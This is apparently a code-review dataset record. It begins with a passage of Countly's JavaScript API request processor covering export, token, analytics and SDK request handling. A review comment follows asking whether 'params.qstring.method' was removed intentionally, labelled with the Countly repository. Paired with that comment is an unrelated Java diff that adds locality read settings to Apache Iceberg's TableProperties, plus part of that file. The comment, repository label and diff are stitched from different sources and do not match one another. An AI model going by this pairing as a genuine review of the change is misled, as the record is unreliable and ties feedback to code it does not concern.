'core', () => { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } taskmanager.checkResult({ db: common.db, id: params.qstring.task_id }, (err, res) => { if (res) { common.returnMessage(params, 200, res.status); } else { common.returnMessage(params, 400, 'Task does not exist'); } }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/system': { switch (paths[3]) { case 'version': validateUserForMgmtReadAPI(() => { common.returnOutput(params, {"version": versionInfo.version}); }, params); break; case 'plugins': validateUserForMgmtReadAPI(() => { common.returnOutput(params, plugins.getPlugins()); }, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/export': { switch (paths[3]) { case 'db': validateUserForMgmtReadAPI(() => { if (!params.qstring.collection) { common.returnMessage(params, 400, 'Missing parameter "collection"'); return false; } if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query, common.reviver); } catch (ex) { params.qstring.query = null; } } if (typeof params.qstring.filter === "string") { try { params.qstring.query = JSON.parse(params.qstring.filter, common.reviver); } catch (ex) { params.qstring.query = null; } } if (typeof params.qstring.projection === "string") { try { params.qstring.projection = JSON.parse(params.qstring.projection); } catch (ex) { params.qstring.projection = null; } } if (typeof params.qstring.project === "string") { try { params.qstring.projection = JSON.parse(params.qstring.project); } catch (ex) { params.qstring.projection = null; } } if (typeof params.qstring.sort === "string") { try { params.qstring.sort = JSON.parse(params.qstring.sort); } catch (ex) { params.qstring.sort = null; } } if (typeof params.qstring.formatFields === "string") { try { params.qstring.formatFields = JSON.parse(params.qstring.formatFields); } catch (ex) { params.qstring.formatFields = null; } } dbUserHasAccessToCollection(params, params.qstring.collection, (hasAccess) => { if (hasAccess) { countlyApi.data.exports.fromDatabase({ db: (params.qstring.db === "countly_drill") ? common.drillDb : (params.qstring.dbs === "countly_drill") ? common.drillDb : common.db, params: params, collection: params.qstring.collection, query: params.qstring.query, projection: params.qstring.projection, sort: params.qstring.sort, limit: params.qstring.limit, skip: params.qstring.skip, type: params.qstring.type, filename: params.qstring.filename }); } else { common.returnMessage(params, 401, 'User does not have access right for this collection'); } }); }, params); break; case 'request': validateUserForMgmtReadAPI(() => { if (!params.qstring.path) { common.returnMessage(params, 400, 'Missing parameter "path"'); return false; } if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Error parsing export request data", params.qstring.data, ex); params.qstring.data = {}; } } countlyApi.data.exports.fromRequest({ params: params, path: params.qstring.path, data: params.qstring.data, method: params.qstring.method, prop: params.qstring.prop, type: params.qstring.type, filename: params.qstring.filename }); }, params); break; case 'requestQuery': validateUserForMgmtReadAPI(() => { if (!params.qstring.path) { common.returnMessage(params, 400, 'Missing parameter "path"'); return false; } if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Error parsing export request data", params.qstring.data, ex); params.qstring.data = {}; } } var my_name = JSON.stringify(params.qstring); var ff = taskmanager.longtask({ db: common.db, threshold: plugins.getConfig("api").request_threshold, force: true, gridfs: true, binary: true, app_id: params.qstring.app_id, params: params, type: "tableExport", report_name: params.qstring.filename + "." + params.qstring.type, meta: JSON.stringify({ "app_id": params.qstring.app_id, "query": params.qstring.query || {} }), name: my_name, view: "#/exportedData/tableExport/", processData: function(err, res, callback) { if (!err) { callback(null, res); } else { callback(err, ''); } }, outputData: function(err, data) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, data); } } }); countlyApi.data.exports.fromRequestQuery({ params: params, path: params.qstring.path, data: params.qstring.data, method: params.qstring.method, prop: params.qstring.prop, type: params.qstring.type, filename: params.qstring.filename + "." + params.qstring.type, output: function(data) { ff(null, data); } }); }, params); break; case 'download': { if (paths[4] && paths[4] !== '') { common.db.collection("long_tasks").findOne({_id: paths[4]}, function(err, data) { var filename = data.report_name; var type = filename.split("."); type = type[type.length - 1]; var myfile = paths[4]; countlyFs.gridfs.getSize("task_results", myfile, {id: paths[4]}, function(error, size) { if (error) { common.returnMessage(params, 400, error); } else if (parseInt(size) === 0) { common.returnMessage(params, 400, "Export size is 0"); } else { countlyFs.gridfs.getStream("task_results", myfile, {id: paths[4]}, function(err5, stream) { if (err5) { common.returnMessage(params, 400, "Export strem does not exist"); } else { var headers = {}; headers["Content-Type"] = countlyApi.data.exports.getType(type); headers["Content-Disposition"] = "attachment;filename=" + encodeURIComponent(filename); params.res.writeHead(200, headers); stream.pipe(params.res); } }); } }); }); } else { common.returnMessage(params, 400, 'Missing filename'); } break; } case 'data': validateUserForMgmtReadAPI(() => { if (!params.qstring.data) { common.returnMessage(params, 400, 'Missing parameter "data"'); return false; } if (typeof params.qstring.data === "string" && !params.qstring.raw) { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { common.returnMessage(params, 400, 'Incorrect parameter "data"'); return false; } } countlyApi.data.exports.fromData(params.qstring.data, { params: params, type: params.qstring.type, filename: params.qstring.filename }); }, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/ping': { common.db.collection("plugins").findOne({_id: "plugins"}, {_id: 1}, (err) => { if (err) { return common.returnMessage(params, 404, 'DB Error'); } else { return common.returnMessage(params, 200, 'Success'); } }); break; } case '/i/token': { switch (paths[3]) { case 'delete': validateUser(() => { if (params.qstring.tokenid) { common.db.collection("auth_tokens").remove({ "_id": params.qstring.tokenid, "owner": params.member._id + "" }, function(err, res) { if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, res); } }); } else { common.returnMessage(params, 404, "Token id not provided"); } }, params); break; case 'create': validateUser(params, () => { let ttl, multi, endpoint, purpose, apps; if (params.qstring.ttl) { ttl = parseInt(params.qstring.ttl); } else { ttl = 1800; } multi = true; if (params.qstring.multi === false || params.qstring.multi === 'false') { multi = false; } apps = params.qstring.apps || ""; if (params.qstring.apps) { apps = params.qstring.apps.split(','); } if (params.qstring.endpointquery && params.qstring.endpointquery !== "") { try { endpoint = JSON.parse(params.qstring.endpointquery); //structure with also info for qstring params. } catch (ex) { if (params.qstring.endpoint) { endpoint = params.qstring.endpoint.split(','); } else { endpoint = ""; } } } else if (params.qstring.endpoint) { endpoint = params.qstring.endpoint.split(','); } if (params.qstring.purpose) { purpose = params.qstring.purpose; } authorize.save({ db: common.db, ttl: ttl, multi: multi, owner: params.member._id + "", app: apps, endpoint: endpoint, purpose: purpose, callback: (err, token) => { if (err) { common.returnMessage(params, 404, err); } else { common.returnMessage(params, 200, token); } } }); }); break; default: common.returnMessage(params, 400, 'Invalid path, must be one of /delete or /create'); } break; } case '/o/token': { //returns all my tokens switch (paths[3]) { case 'check': if (!params.qstring.token) { common.returnMessage(params, 400, 'Missing parameter "token"'); return false; } validateUser(params, function() { authorize.check_if_expired({ token: params.qstring.token, db: common.db, callback: (err, valid, time_left)=>{ if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, { valid: valid, time: time_left }); } } }); }); break; case 'list': validateUser(params, function() { common.db.collection("auth_tokens").find({"owner": params.member._id + ""}).toArray(function(err, res) { if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, res); } }); }); break; default: common.returnMessage(params, 400, 'Invalid path, must be one of /list'); } break; } case '/o': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } switch (params.qstring.method) { case 'jobs': validateRead(params, "global_jobs", countlyApi.data.fetch.fetchJobs('jobs', params)); break; case 'total_users': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTotalUsersObj, params.qstring.metric || 'users'); break; case 'get_period_obj': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.getPeriodObj, 'users'); break; case 'locations': case 'sessions': case 'users': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, 'users'); break; case 'app_versions': case 'device_details': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, 'device_details'); break; case 'devices': case 'carriers': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, params.qstring.method); break; case 'cities': if (plugins.getConfig("api", params.app && params.app.plugins, true).city_data !== false) { validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, params.qstring.method); } else { common.returnOutput(params, {}); } break; case 'geodata': { validateRead(params, 'core', function() { if (params.qstring.loadFor === "cities") { countlyApi.data.geoData.loadCityCoordiantes({"query": params.qstring.query}, function(err, data) { common.returnOutput(params, data); }); } }); break; } case 'get_event_groups': validateRead(params, 'core', countlyApi.data.fetch.fetchEventGroups); break; case 'get_event_group': validateRead(params, 'core', countlyApi.data.fetch.fetchEventGroupById); break; case 'events': if (params.qstring.events) { try { params.qstring.events = JSON.parse(params.qstring.events); } catch (SyntaxError) { console.log('Parse events array failed', params.qstring.events, params.req.url, params.req.body); } if (params.qstring.overview) { // TODO: handle here, what permission should be required for here? countlyApi.data.fetch.fetchDataEventsOverview(params); } else { // TODO: handle here what permission should be required for here? validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventData); } } else { if (params.qstring.event && params.qstring.event.startsWith('[CLY]_group_')) { validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups, params.qstring.method); } else { params.truncateEventValuesList = true; validateRead(params, 'core', countlyApi.data.fetch.prefetchEventData, params.qstring.method); } } break; case 'get_events': validateRead(params, 'core', countlyApi.data.fetch.fetchCollection, 'events'); break; case 'top_events': validateRead(params, 'core', countlyApi.data.fetch.fetchDataTopEvents); break; case 'all_apps': validateRead(params, 'global_applications', countlyApi.data.fetch.fetchAllApps); break; case 'notes': validateRead(params, 'core', countlyApi.mgmt.users.fetchNotes); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid method'); } break; } break; } case '/o/analytics': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } switch (paths[3]) { case 'dashboard': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchDashboard); break; case 'countries': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchCountries); break; case 'sessions': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchSessions); break; case 'metric': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchMetric); break; case 'tops': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTops); break; case 'loyalty': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchLoyalty); break; case 'frequency': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchFrequency); break; case 'durations': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchDurations); break; case 'events': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchEvents); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /dashboard or /countries'); } break; } break; } case '/o/countly_version': { validateUser(params, () => { //load previos version info if exist loadFsVersionMarks(function(errFs, fsValues) { loadDbVersionMarks(function(errDb, dbValues) { var response = {}; if (errFs) { response.fs = errFs; } else { response.fs = fsValues; } if (errDb) { response.db = errDb; } else { response.db = dbValues; } response.pkg = packageJson.version || ""; var statusCode = (errFs && errDb) ? 400 : 200; common.returnMessage(params, statusCode, response); }); }); }); break; } case '/o/sdk': { params.ip_address = params.qstring.ip_address || common.getIpAddress(params.req); params.user = {}; if (!params.qstring.app_key || !params.qstring.device_id) { common.returnMessage(params, 400, 'Missing parameter "app_key" or "device_id"'); return false; } else { params.qstring.device_id += ""; params.app_user_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.device_id + "") .digest('hex'); } log.d('processing request %j', params.qstring); params.promises = []; validateAppForFetchAPI(params, () => { }); break; } case '/o/notes': { validateUserForDataReadAPI(params, 'core', countlyApi.mgmt.users.fetchNotes); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForWriteAPI: validateUserForWriteAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { if (!plugins.dispatch(params.fullPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForWriteAPI: validateUserForWriteAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } } } } else { if (!params.res.finished) { common.returnMessage(params, 200, 'Request ignored: ' + params.cancelRequest); } common.log("request").i('Request ignored: ' + params.cancelRequest, params.req.url, params.req.body); } }, function() {}); }; /** * Process Request Data * @param {params} params - params object * @param {object} app - app document * @param {function} done - callbck when processing done */ const processRequestData = (params, app, done) => { //preserve time for user's previous session params.previous_session = params.app_user.lsid; params.previous_session_start = params.app_user.ls; params.request_id = params.request_hash + "_" + params.app_user.uid + "_" + params.time.mstimestamp; var ob = {params: params, app: app, updates: []}; plugins.dispatch("/sdk/user_properties", ob, function() { var update = {}; //check if we already processed app users for this request if (params.app_user.last_req !== params.request_hash && ob.updates.length) { ob.updates.push({$set: {last_req: params.request_hash, ingested: false}}); for (let i = 0; i < ob.updates.length; i++) { update = common.mergeQuery(update, ob.updates[i]); } } var newUser = params.app_user.fs ? false : true; common.updateAppUser(params, update, function() { if (!plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } if (params.qstring.begin_session) { plugins.dispatch("/session/retention", { params: params, user: params.app_user, isNewUser: newUser }); } if (params.qstring.events) { if (params.promises) { params.promises.push(countlyApi.data.events.processEvents(params)); } else { countlyApi.data.events.processEvents(params); } } //process the rest of the plugins as usual plugins.dispatch("/i", { params: params, app: app }); plugins.dispatch("/sdk/data_ingestion", {params: params}, function(result) { var retry = false; if (result && result.length) { for (let index = 0; index < result.length; index++) { if (result[index].status === "rejected") { retry = true; break; } } } if (!retry && plugins.getConfig("api", params.app && params.app.plugins, true).safe) { //acknowledge data ingestion common.updateAppUser(params, {$set: {ingested: true}}); } if (!params.res.finished) { if (retry) { common.returnMessage(params, 400, 'Could not ingest data'); } else { common.returnMessage(params, 200, 'Success'); } } if (done) { done(); } }); }); }); }; /** * Process fetch request from sdk * @param {object} params - params object * @param {object} app - app document * @param {function} done - callback when processing done */ const processFetchRequest = (params, app, done) => { if (params.qstring.metrics) { try { countlyApi.data.usage.returnAllProcessedMetrics(params); } catch (ex) { console.log("Could not process metrics"); } } plugins.dispatch("/o/sdk", { params: params, app: app }, () => { if (!params.res.finished) { common.returnMessage(params, 400, 'Invalid method'); } //LOGGING THE REQUEST AFTER THE RESPONSE HAS BEEN SENT plugins.dispatch("/o/sdk/log", { params: params, app: params.app }, () => { }); return done ? done() : false; }); }; /** * Process Bulk Request * @param {number} i - request number in bulk * @param {array} requests - array of requests to process * @param {params} params - params object * @returns {void} void */ const processBulkRequest = (i, requests, params) => { const appKey = params.qstring.app_key; if (i === requests.length) { common.unblockResponses(params); if (plugins.getConfig("api", params.app && params.app.plugins, true).safe && !params.res.finished) { common.returnMessage(params, 200, 'Success'); } return; } if (!requests[i] || (!requests[i].app_key && !appKey)) { return processBulkRequest(i + 1, requests, params); } params.req.body = JSON.stringify(requests[i]); const tmpParams = { 'app_id': '', 'app_cc': '', 'ip_address': requests[i].ip_address || common.getIpAddress(params.req), 'user': { 'country': requests[i].country_code || 'Unknown', 'city': requests[i].city || 'Unknown' }, 'qstring': requests[i], 'href': "/i", 'res': params.res, 'req': params.req, 'promises': [], 'bulk': true, 'populator': params.qstring.populator }; tmpParams.qstring.app_key = (requests[i].app_key || appKey) + ""; if (!tmpParams.qstring.device_id) { return processBulkRequest(i + 1, requests, params); } else { //make sure device_id is string tmpParams.qstring.device_id += ""; tmpParams.app_user_id = common.crypto.createHash('sha1') .update(tmpParams.qstring.app_key + tmpParams.qstring.device_id + "") .digest('hex'); } return validateAppForWriteAPI(tmpParams, () => { /** * Dispatches /sdk/end event upon finishing processing request **/ function resolver() { plugins.dispatch("/sdk/end", {params: tmpParams}, () => { processBulkRequest(i + 1, requests, params); }); } Promise.all(tmpParams.promises) .then(resolver) .catch((error) => { console.log(error); resolver(); }); }); }; /** * @param {object} params - params object * @param {String} type - source type * @param {Function} done - done callback * @returns {Function} - done or boolean value */ const checksumSaltVerification = (params) => { if (params.app.checksum_salt && params.app.checksum_salt.length && !params.no_checksum) { const payloads = []; payloads.push(params.href.substr(params.fullPath.length + 1)); if (params.req.method.toLowerCase() === 'post') { payloads.push(params.req.body); } if (typeof params.qstring.checksum !== "undefined") { for (let i = 0; i < payloads.length; i++) { payloads[i] = (payloads[i] + "").replace("&checksum=" + params.qstring.checksum, "").replace("checksum=" + params.qstring.checksum, ""); payloads[i] = common.crypto.createHash('sha1').update(payloads[i] + params.app.checksum_salt).digest('hex').toUpperCase(); } if (payloads.indexOf((params.qstring.checksum + "").toUpperCase()) === -1) { common.returnMessage(params, 200, 'Request does not match checksum'); console.log("Checksum did not match", params.href, params.req.body, payloads); params.cancelRequest = 'Request does not match checksum sha1'; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } else if (typeof params.qstring.checksum256 !== "undefined") { for (let i = 0; i < payloads.length; i++) { payloads[i] = (payloads[i] + "").replace("&checksum256=" + params.qstring.checksum256, "").replace("checksum256=" + params.qstring.checksum256, ""); payloads[i] = common.crypto.createHash('sha256').update(payloads[i] + params.app.checksum_salt).digest('hex').toUpperCase(); } if (payloads.indexOf((params.qstring.checksum256 + "").toUpperCase()) === -1) { common.returnMessage(params, 200, 'Request does not match checksum'); console.log("Checksum did not match", params.href, params.req.body, payloads); params.cancelRequest = 'Request does not match checksum sha256'; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } else { common.returnMessage(params, 200, 'Request does not have checksum'); console.log("Request does not have checksum", params.href, params.req.body); params.cancelRequest = "Request does not have checksum"; plugins.dispatch("/sdk/cancel", {params: params}); return false; } } return true; }; /** * Validate App for Write API * Checks app_key from the http request against "apps" collection. * This is the first step of every write request to API. * @param {params} params - params object * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {void} void */ const validateAppForWriteAPI = (params, done, try_times) => { if (ignorePossibleDevices(params)) { return done ? done() : false; } common.readBatcher.getOne("apps", {'key': params.qstring.app_key + ""}, (err, app) => { if (!app) { common.returnMessage(params, 400, 'App does not exist'); params.cancelRequest = "App not found or no Database connection"; return done ? done() : false; } if (app.paused) { common.returnMessage(params, 400, 'App is currently not accepting data'); params.cancelRequest = "App is currently not accepting data"; plugins.dispatch("/sdk/cancel", {params: params}); return done ? done() : false; } if ((params.populator || params.qstring.populator) && app.locked) { common.returnMessage(params, 403, "App is locked"); params.cancelRequest = "App is locked"; plugins.dispatch("/sdk/cancel", {params: params}); return false; } params.app_id = app._id; params.app_cc = app.country; params.app_name = app.name; params.appTimezone = app.timezone; params.app = app; params.time = common.initTimeObj(params.appTimezone, params.qstring.timestamp); var time = Date.now().valueOf(); time = Math.round((time || 0) / 1000); if (params.app && (!params.app.last_data || params.app.last_data < time - 60 * 60 * 24)) { //update if more than day passed //set new value common.db.collection("apps").update({"_id": common.db.ObjectID(params.app._id)}, {"$set": {"last_data": time}}, function(err1) { if (err1) { console.log("Failed to update apps collection " + err1); } common.readBatcher.invalidate("apps", {"key": params.app.key}, {}, false); //because we load app by key on incoming requests. so invalidate also by key }); } if (!checksumSaltVerification(params)) { return done ? done() : false; } if (typeof params.qstring.tz !== 'undefined' && !isNaN(parseInt(params.qstring.tz))) { params.user.tz = parseInt(params.qstring.tz); } common.db.collection('app_users' + params.app_id).findOne({'_id': params.app_user_id}, (err2, user) => { if (err2) { common.returnMessage(params, 400, 'Cannot get app user'); params.cancelRequest = "Cannot get app user or no Database connection"; return done ? done() : false; } params.app_user = user || {}; let payload = params.href.substr(3) || ""; if (params.req.method.toLowerCase() === 'post') { payload += params.req.body; } params.request_hash = common.crypto.createHash('sha1').update(payload).digest('hex') + (params.qstring.timestamp || params.time.mstimestamp); if (plugins.getConfig("api", params.app && params.app.plugins, true).prevent_duplicate_requests) { //check unique millisecond timestamp, if it is the same as the last request had, //then we are having duplicate request, due to sudden connection termination if (params.app_user.last_req === params.request_hash && (!plugins.getConfig("api", params.app && params.app.plugins, true).safe || params.app_user.ingested)) { params.cancelRequest = "Duplicate request"; } } if (params.qstring.metrics && typeof params.qstring.metrics === "string") { try { params.qstring.metrics = JSON.parse(params.qstring.metrics); } catch (SyntaxError) { console.log('Parse metrics JSON failed', params.qstring.metrics, params.req.url, params.req.body); } } plugins.dispatch("/sdk/pre", { params: params, app: app }, () => { plugins.dispatch("/sdk", { params: params, app: app }, () => { plugins.dispatch("/sdk/log", {params: params}); if (!params.cancelRequest) { processUser(params, validateAppForWriteAPI, done, try_times).then((userErr) => { if (userErr) { if (!params.res.finished) { common.returnMessage(params, 400, userErr); } } else { processRequestData(params, app, done); } }); } else { if (!params.res.finished && !params.waitForResponse) { common.returnOutput(params, {result: 'Success', info: 'Request ignored: ' + params.cancelRequest}); //common.returnMessage(params, 200, 'Request ignored: ' + params.cancelRequest); } common.log("request").i('Request ignored: ' + params.cancelRequest, params.req.url, params.req.body); return done ? done() : false; } }); }); }); }); }; /** * Validate app for fetch API from sdk * @param {object} params - params object * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {function} done - done callback */ const validateAppForFetchAPI = (params, done, try_times) => { if (ignorePossibleDevices(params)) { return done ? done() : false; } common.readBatcher.getOne("apps", {'key': params.qstring.app_key}, (err, app) => { if (!app) { common.returnMessage(params, 400, 'App does not exist'); params.cancelRequest = "App not found or no Database connection"; return done ? done() : false; } params.app_id = app._id; params.app_cc = app.country; params.app_name = app.name; params.appTimezone = app.timezone; params.app = app; params.time = common.initTimeObj(params.appTimezone, params.qstring.timestamp); if (!checksumSaltVerification(params)) { return done ? done() : false; } if (params.qstring.metrics && typeof params.qstring.metrics === "string") { try { params.qstring.metrics = JSON.parse(params.qstring.metrics); } catch (SyntaxError) { console.log('Parse metrics JSON failed for sdk fetch request', params.qstring.metrics, params.req.url, params.req.body); } } var parallelTasks = [countlyApi.data.usage.setLocation(params)]; var processThisUser = true; if (app.paused) { log.d("App is currently not accepting data"); processThisUser = false; } if ((params.populator || params.qstring.populator) && app.locked) { log.d("App is locked"); processThisUser = false; } if (!processThisUser) { parallelTasks.push(fetchAppUser(params)); } else { parallelTasks.push(fetchAppUser(params).then(() => { return processUser(params, validateAppForFetchAPI, done, try_times); })); } Promise.all( parallelTasks ) .catch((error) => { console.error(error); }) .finally(() => { processFetchRequest(params, app, done); }); }); }; /** * Restart Request * @param {params} params - params object * @param {function} initiator - function which initiated request * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @param {function} fail - callback when restart limit reached * @returns {void} void */ const restartRequest = (params, initiator, done, try_times, fail) => { if (!try_times) { try_times = 1; } else { try_times++; } if (try_times > 5) { console.log("Too many retries", try_times); if (typeof fail === "function") { fail("Cannot process request. Too many retries"); } return; } params.retry_request = true; //retry request initiator(params, done, try_times); }; /** * @param {object} params - params object * @param {function} initiator - function which initiated request * @param {function} done - callback when processing done * @param {number} try_times - how many times request was retried * @returns {Promise} - resolved */ function processUser(params, initiator, done, try_times) { return new Promise((resolve) => { if (!params.app_user.uid) { //first time we see this user, we need to id him with uid countlyApi.mgmt.appUsers.getUid(params.app_id, function(err, uid) { plugins.dispatch("/i/app_users/create", { app_id: params.app_id, user: {uid: uid, did: params.qstring.device_id, _id: params.app_user_id }, res: {uid: uid, did: params.qstring.device_id, _id: params.app_user_id }, params: params }); if (uid) { params.app_user.uid = uid; if (!params.app_user._id) { //if document was not yet created //we try to insert one with uid //even if paralel request already inserted uid //this insert will fail //but we will retry again and fetch new inserted document common.db.collection('app_users' + params.app_id).insert({ _id: params.app_user_id, uid: uid, did: params.qstring.device_id }, {ignore_errors: [11000]}, function() { restartRequest(params, initiator, done, try_times, resolve); }); } else { //document was created, but has no uid //here we add uid only if it does not exist in db //so if paralel request inserted it, we will not overwrite it //and retrieve that uid on retry common.db.collection('app_users' + params.app_id).update({ _id: params.app_user_id, uid: {$exists: false} }, {$set: {uid: uid}}, {upsert: true, ignore_errors: [11000]}, function() { restartRequest(params, initiator, done, try_times, resolve); }); } } else { //cannot create uid, so cannot process request now console.log("Cannot create uid", err, uid); resolve("Cannot create uid"); } }); } //check if device id was changed else if (params.qstring.old_device_id && params.qstring.old_device_id !== params.qstring.device_id) { const old_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.old_device_id + "") .digest('hex'); countlyApi.mgmt.appUsers.merge(params.app_id, params.app_user, params.app_user_id, old_id, params.qstring.device_id, params.qstring.old_device_id, function(err) { if (err) { return common.returnMessage(params, 400, 'Cannot update user'); } //remove old device ID and retry request params.qstring.old_device_id = null; restartRequest(params, initiator, done, try_times, resolve); }); } else { resolve(); } }); } /** * Function to fetch app user from db * @param {object} params - params object * @returns {promise} - user */ const fetchAppUser = (params) => { return new Promise((resolve) => { common.db.collection('app_users' + params.app_id).findOne({'_id': params.app_user_id}, (err2, user) => { params.app_user = user || {}; return resolve(user); }); }); }; /** * Add devices to ignore them * @param {params} params - params object * @param {function} done - callback when processing done * @returns {function} done */ const ignorePossibleDevices = (params) => { //ignore possible opted out users for ios 10 if (params.qstring.device_id === "00000000-0000-0000-0000-000000000000") { common.returnMessage(params, 400, 'Ignoring device_id'); common.log("request").i('Request ignored: Ignoring zero IDFA device_id', params.req.url, params.req.body); params.cancelRequest = "Ignoring zero IDFA device_id"; plugins.dispatch("/sdk/cancel", {params: params}); return true; } }; /** * Fetches version mark history (filesystem) * @param {function} callback - callback when response is ready * @returns {void} void */ function loadFsVersionMarks(callback) { fs.readFile(path.resolve(__dirname, "./../../countly_marked_version.json"), function(err, data) { if (err) { callback(err, []); } else { var olderVersions = []; try { olderVersions = JSON.parse(data); } catch (parseErr) { //unable to parse file console.log(parseErr); callback(parseErr, []); } if (Array.isArray(olderVersions)) { //sort versions here. olderVersions.sort(function(a, b) { if (typeof a.updated !== "undefined" && typeof b.updated !== "undefined") { return a.updated - b.updated; } else { return 1; } }); callback(null, olderVersions); } } }); } /** * Fetches version mark history (database) * @param {function} callback - callback when response is ready * @returns {void} void */ function loadDbVersionMarks(callback) { common.db.collection('plugins').find({'_id': 'version'}, {"history": 1}).toArray(function(err, versionDocs) { if (err) { console.log(err); callback(err, []); return; } var history = []; if (versionDocs[0] && versionDocs[0].history) { history = versionDocs[0].history; } callback(null, history); }); } /** @lends module:api/utils/requestProcessor */ module.exports = {processRequest: processRequest};
1
14,332
did you remove **params.qstring.method** intentionally? if so why?
Countly-countly-server
js
@@ -90,6 +90,12 @@ public class TableProperties { public static final String ORC_VECTORIZATION_ENABLED = "read.orc.vectorization.enabled"; public static final boolean ORC_VECTORIZATION_ENABLED_DEFAULT = false; + public static final String LOCALITY_ENABLED = "read.locality.enabled"; + public static final String LOCALITY_ENABLED_DEFAULT = null; + + public static final String LOCALITY_TASK_INITIALIZE_THREADS = "read.locality.task.initialize.threads"; + public static final int LOCALITY_TASK_INITIALIZE_THREADS_DEFAULT = 1; + public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled"; public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
1
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg; public class TableProperties { private TableProperties() { } public static final String COMMIT_NUM_RETRIES = "commit.retry.num-retries"; public static final int COMMIT_NUM_RETRIES_DEFAULT = 4; public static final String COMMIT_MIN_RETRY_WAIT_MS = "commit.retry.min-wait-ms"; public static final int COMMIT_MIN_RETRY_WAIT_MS_DEFAULT = 100; public static final String COMMIT_MAX_RETRY_WAIT_MS = "commit.retry.max-wait-ms"; public static final int COMMIT_MAX_RETRY_WAIT_MS_DEFAULT = 60000; 